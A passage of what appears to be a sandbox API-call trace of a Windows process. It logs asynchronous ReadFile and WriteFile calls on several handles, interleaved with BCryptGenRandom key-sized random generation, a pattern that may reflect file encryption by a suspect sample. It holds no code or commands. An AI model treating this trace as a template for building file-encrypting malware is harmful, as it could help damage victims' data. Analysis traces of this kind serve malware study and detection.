CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.565] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8a0c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.601] CloseHandle (hObject=0x3cc) returned 1 [0147.601] free (_Block=0x3d70450) [0147.601] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.617] CloseHandle (hObject=0x2a8) returned 1 [0147.617] free (_Block=0x3fb00b8) [0147.617] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.633] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x3b2e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0147.644] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.648] ReadFile (in: hFile=0x2a8, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x3ed2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0147.650] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.740] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x7460, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.740] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.742] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x6fe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.743] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.753] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.754] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.754] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.754] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.755] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.755] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.755] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.755] free (_Block=0x3e305b8) [0147.755] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.755] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.755] free (_Block=0x1fa91d0) [0147.755] free (_Block=0x1fa2ed8) [0147.755] free (_Block=0x1fa90b8) [0147.755] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.756] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.759] CloseHandle (hObject=0x3cc) returned 1 [0147.759] free (_Block=0x3d70450) [0147.759] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.766] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c88, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0147.772] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.787] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.787] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.787] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.788] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.788] free (_Block=0x3e305b8) [0147.788] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.788] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.788] free (_Block=0x1fa91d0) [0147.788] free (_Block=0x1fa2ed8) [0147.788] free (_Block=0x1fa90b8) [0147.788] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0147.788] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.796] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.797] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.797] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.797] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.798] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.798] free (_Block=0x3e305b8) [0147.798] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.798] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.798] free (_Block=0x1fa91d0) [0147.798] free (_Block=0x1fa2ed8) [0147.798] free (_Block=0x1fa90b8) [0147.798] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0147.798] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.802] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x4e50, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0147.802] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.814] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.815] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.815] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.815] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.816] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.816] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.816] free (_Block=0x3e305b8) [0147.816] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.816] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.817] free (_Block=0x1fa91d0) [0147.817] free (_Block=0x1fa2ed8) [0147.817] free (_Block=0x1fa90b8) [0147.817] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0147.817] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0147.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0147.830] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0147.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0147.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0147.830] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0147.831] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0147.831] free (_Block=0x3e305b8) [0147.831] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0147.831] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0147.831] free (_Block=0x1fa91d0) [0147.831] free (_Block=0x1fa2ed8) [0147.831] free (_Block=0x1fa90b8) [0147.831] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0147.831] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.269] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1bd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0149.269] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.279] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.280] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.280] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0149.280] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0149.281] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0149.281] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0149.281] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0149.281] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0149.281] free (_Block=0x3e305b8) [0149.281] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0149.281] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0149.282] free (_Block=0x1fa91d0) [0149.282] free (_Block=0x1fa2ed8) [0149.282] free (_Block=0x1fa90b8) [0149.282] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0149.283] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.288] CloseHandle (hObject=0xec) returned 1 [0149.288] free (_Block=0x1ff1e60) [0149.288] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.302] CloseHandle (hObject=0x308) returned 1 [0149.303] free (_Block=0x3d70450) [0149.303] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.320] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2394, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.338] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1258, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0149.339] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.627] CloseHandle (hObject=0x2a8) returned 1 [0149.628] free (_Block=0x3df0008) [0149.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.628] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xd90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0149.628] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.642] ReadFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1388, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0149.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0149.975] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x29dc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0149.989] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.003] ReadFile (in: hFile=0x3cc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x16c0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0150.014] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.026] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x3e9e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0150.035] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.112] CloseHandle (hObject=0x308) returned 1 [0150.112] free (_Block=0x3df0008) [0150.112] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.120] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.120] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.132] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x11c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0150.132] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.146] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x72f8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0150.158] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.184] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x48be, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0150.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.234] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0150.234] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.246] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.246] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0150.246] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0150.247] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0150.247] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0150.247] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0150.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0150.247] free (_Block=0x3e305b8) [0150.247] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0150.247] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0150.248] free (_Block=0x1fa91d0) [0150.248] free (_Block=0x1fa2ed8) [0150.248] free (_Block=0x1fa90b8) [0150.248] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0150.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.260] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0150.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.275] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xef2, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0150.275] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0150.290] ReadFile (in: hFile=0x3cc, 